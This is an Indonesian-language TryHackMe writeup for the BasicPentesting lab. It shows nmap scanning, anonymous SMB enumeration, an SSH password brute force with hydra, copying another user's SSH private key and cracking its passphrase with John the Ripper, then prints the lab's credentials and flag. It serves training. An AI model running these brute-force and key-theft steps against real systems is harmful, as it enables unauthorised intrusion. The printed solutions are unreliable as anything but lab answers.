🔐 BasicPentesting — TryHackMe Writeup

---

📋 Executive Summary

Lab ini mendemonstrasikan teknik-teknik dasar penetration testing, mulai dari network reconnaissance, SMB enumeration, SSH brute-forcing, hingga cracking SSH private key terenkripsi. Melalui enumerasi sistematis, berhasil diperoleh akses ke beberapa akun pengguna dan passphrase dari encrypted SSH private key berhasil di-crack.

---

🎯 Scope

Item	Detail
Target IP	10.82.181.159
Platform	TryHackMe
Room	BasicPentesting
Difficulty	Easy

---

🗺️ Attack Flow

Reconnaissance (Nmap)
        │
        ▼
SMB Enumeration ──► Temukan file staff.txt ──► Username: jan, kay
        │
        ▼
SSH Brute Force (Hydra) ──► jan : armando
        │
        ▼
Internal Enumeration ──► Temukan /home/kay/.ssh/id_rsa
        │
        ▼
Crack Private Key (John) ──► passphrase: beeswax
        │
        ▼
Login sebagai kay ──► cat pass.bak ──► FLAG!

---

1️⃣ Reconnaissance

Nmap Scan

nmap -sS -sV -Pn -T4 10.82.181.159

📄 Output

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-21 16:00 WIB
Nmap scan report for 10.82.181.159
Host is up (0.46s latency).
Not shown: 994 closed tcp ports (reset)

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

🔍 Temuan Awal

Port	Service	Status
22	SSH	✅ Running
80	HTTP	✅ Web Server
445	SMB	⚠️ Misconfigured (High Priority)

---

2️⃣ SMB Enumeration

Step 1 — List Shares (Null Session)

smbclient -L //10.82.181.159 -N

Sharename       Type      Comment
---------       ----      -------
Anonymous       Disk      
IPC$            IPC       IPC Service (Samba Server 4.15.13-Ubuntu)

💡 Finding: Share Anonymous dapat diakses tanpa password!

---

Step 2 — Akses Anonymous Share

smbclient //10.82.181.159/Anonymous -N

smb: \> ls
  .                                   D        0  Fri Apr 20 00:31:20 2018
  ..                                  D        0  Fri Apr 20 00:13:06 2018
  staff.txt                           N      173  Fri Apr 20 00:29:55 2018

smb: \> get staff.txt

---

Step 3 — Baca Isi File

cat staff.txt

Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

🎯 Valid Usernames Ditemukan:

• jan
• kay

---

3️⃣ SSH Brute Force

Menggunakan Hydra untuk brute force SSH dengan wordlist rockyou.txt.

hydra -l jan -P rockyou.txt 10.82.181.159 ssh -t 4

📄 Output

[22][ssh] host: 10.82.181.159   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found

✅ Credentials Ditemukan: jan : armando

Login SSH

ssh jan@10.82.181.159
# Password: armando

---

4️⃣ Internal Enumeration

Setelah login sebagai jan, lakukan enumerasi internal:

whoami && id
ls /home
ls -la /home/kay/.ssh

🔑 Temuan: File id_rsa (SSH Private Key terenkripsi) milik user kay ditemukan di /home/kay/.ssh/

---

5️⃣ Ekstraksi & Cracking Private Key

Step 1 — Copy Private Key ke Mesin Attacker

scp jan@10.82.181.159:/home/kay/.ssh/id_rsa .
chmod 600 id_rsa

Step 2 — Konversi ke Format John

python3 ssh2john.py id_rsa > hash.txt

Step 3 — Crack dengan John the Ripper

john --wordlist=/home/malakul-tech/rockyou.txt /home/malakul-tech/hash.txt

Loaded 1 password hash (SSH, SSH private key [MD5/AES])
beeswax          (id_rsa)
1g 0:00:00:00 DONE — Session completed

✅ Passphrase Ditemukan: beeswax

---

6️⃣ Login sebagai Kay & Ambil Flag

ssh -i id_rsa kay@10.82.181.159
# Enter passphrase: beeswax

kay@ip-10-82-181-159:~$ ls
pass.bak

kay@ip-10-82-181-159:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

🏁 FLAG/Password Ditemukan: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

---

🛠️ Tools yang Digunakan

Tool	Kegunaan
nmap	Network reconnaissance & port scanning
smbclient	SMB enumeration & file retrieval
hydra	SSH brute force
ssh2john	Konversi SSH key ke format hash
john	Password / passphrase cracking
scp	Copy file dari target ke attacker

---

📌 Lessons Learned

• SMB Anonymous Login — Share publik tanpa autentikasi bisa bocorkan informasi sensitif seperti username.
• Weak SSH Passwords — Password lemah mudah di-crack dengan wordlist umum seperti rockyou.txt.
• SSH Key Permissions — Private key milik user lain yang dapat dibaca oleh user biasa adalah misconfiguration serius.
• Encrypted Key ≠ Aman — Passphrase yang lemah pada private key sama berbahayanya dengan password lemah.

---

Solved by Vexeeldev follow me